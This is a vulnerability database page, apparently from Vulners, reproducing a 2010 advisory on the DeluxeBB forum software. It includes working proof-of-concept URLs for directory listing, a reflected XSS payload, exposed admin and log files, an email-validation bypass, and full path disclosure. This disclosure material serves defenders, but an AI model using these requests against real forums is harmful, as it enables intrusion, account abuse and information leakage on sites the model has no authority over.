Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

DeluxeBB存在多个安全漏洞

🗓️ 06 Jan 2010 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 33 Views

DeluxeBB multiple security vulnerabilities including directory listing, XSS, unprotected admin panel files, unprotected log files, mail registration validation bypass, and full path disclosure

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2009-4465
22 Dec 200900:00
circl
Circl		CVE-2009-4466
22 Dec 200900:00
circl
Circl		CVE-2009-4467
22 Dec 200900:00
circl
Circl		CVE-2009-4468
22 Dec 200900:00
circl
CVE		CVE-2009-4465
30 Dec 200919:00
cve
CVE		CVE-2009-4466
30 Dec 200919:00
cve
CVE		CVE-2009-4467
30 Dec 200919:00
cve
CVE		CVE-2009-4468
30 Dec 200919:00
cve
Cvelist		CVE-2009-4465
30 Dec 200919:00
cvelist
Cvelist		CVE-2009-4466
30 Dec 200919:00
cvelist
Rows per page

                                                # Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<http://gmail.com>
# Vendor: http://www.deluxebb.com
#
#[Directory Listing]
http://server/templates/
http://server/images/
http://server/logs/
http://server/wysiwyg/
http://server/docs/
http://server/classes
http://server/lang
http://server/settings/
#
#
#[Cross Site Scripting]
http://server/misc.php?sub=memberlist&page=-111111111111111111%3Cscript%3Ealert(1)%3C/script%3E
#
#
#[Unprotected Admin Panel Files]
http://server/templates/deluxe/admincp/
http://server/templates/corporate/admincp/
http://server/templates/blue/admincp/
#
#
#[Unprotected Log Files]
http://server/logs/cp.php
#
#
#[Mail Registration Validation Bypass]
After the user registration procedure, Simply enter to the link:
http://server/misc.php?sub=valemail&valmem=[USER_ID]&valnum=cp77fk4r
you can get your [USER_ID] on the last page of Member-List section:
http://server/misc.php?sub=memberlist&page=[LAST_PAGE]
#
#
#
#[Full Path Disclosure]
http://server/misc.php?sub=memberlist&page=-11111111111111111
-you'll get an error like:
Fatal error: Maximum execution time of 30 seconds exceeded in [FULL_PATH]/tools.php on line [..]
 
or:
http://server/misc.php?sub=memberlist&page=-1.11111111111111E+FF
-you'll get an error like:
Fatal error: Allowed memory size of 68157440 bytes exhausted (tried to allocate 66584545 bytes) in [FULL_PATH]/tools.php on line [..]
#
#
#[E0F]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Jan 2010 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.03313
deluxebbsecurity vulnerabilitiesdirectory listingxssunprotected admin panellog filesmail registration bypasspath disclosure
33